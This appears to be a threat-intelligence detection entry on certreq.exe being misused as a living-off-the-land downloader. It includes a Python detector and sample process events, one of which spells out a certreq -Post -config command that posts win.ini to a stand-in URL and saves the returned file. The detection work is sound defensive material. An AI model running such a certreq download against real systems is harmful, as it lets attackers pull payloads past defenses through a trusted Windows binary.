Intel Name: Suspicious certreq command to download
Date of Scan: November 7, 2025
Impact: High
Summary: Detects a suspicious CertReq execution that initiates a file download. This activity is commonly associated with attackers attempting to retrieve additional payloads or configuration files. CertReq is a legitimate Windows utility designed to request and obtain certificates from a Certification Authority (CA); however, it can be misused by threat actors as a living-off-the-land (LotL) technique to facilitate malicious downloads.
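The following is an added illustration of how the detection described above can be expressed over process-creation telemetry; it is not the rule's own logic and not code from the page. It assumes events carry an `image` (executable path) and `cmdline` field, as Sysmon event ID 4688-style or EDR process-creation records typically do, and it keys on the `-Post` and `-config` switches combined with an HTTP(S) URL, which is the documented certreq invocation pattern for a web request. The sample events are constructed for this example.

```python
import re

# Constructed sample process-creation events (not taken from the page).
# The first one models a download-style invocation; the others are benign
# certificate-enrollment and unrelated activity that must not fire.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certreq.exe",
     "cmdline": r"certreq -Post -config https://files.example.invalid/stage C:\Windows\win.ini C:\Users\Public\out.bin"},
    {"image": r"C:\Windows\System32\certreq.exe",
     "cmdline": r'certreq -submit -config "ca.corp.example\CorpCA" request.req cert.cer'},
    {"image": r"C:\Windows\System32\certreq.exe",
     "cmdline": r"certreq -new policy.inf request.req"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\Users"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _switches(cmdline: str) -> set[str]:
    """Collect switch tokens in normalized form: '-Post' and '/post' both become 'post'."""
    return {tok[1:].lower() for tok in cmdline.split() if tok[:1] in "-/" and len(tok) > 1}


def is_suspicious_certreq(image: str, cmdline: str) -> bool:
    """True when certreq.exe is invoked with -Post and -config against a URL.

    Both switches together plus an HTTP(S) target are the download-shaped
    invocation; -submit/-new/-accept enrollment flows against an enterprise CA
    do not match, which keeps ordinary PKI operations quiet.
    """
    if not image.lower().endswith("\\certreq.exe"):
        return False
    sw = _switches(cmdline)
    return "post" in sw and "config" in sw and URL_RE.search(cmdline) is not None


def scan_events(events: list[dict]) -> list[dict]:
    """Return the subset of events that match the certreq download pattern."""
    return [e for e in events if is_suspicious_certreq(e["image"], e["cmdline"])]


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print("ALERT certreq download pattern:", hit["cmdline"])
```

Tuning note: environments that use Certificate Enrollment Web Services may legitimately pass an HTTPS URL to `-config`, so in such estates the rule should be scoped to `-Post` as well (as done here) and reviewed against a baseline of known enrollment endpoints before being promoted to high severity.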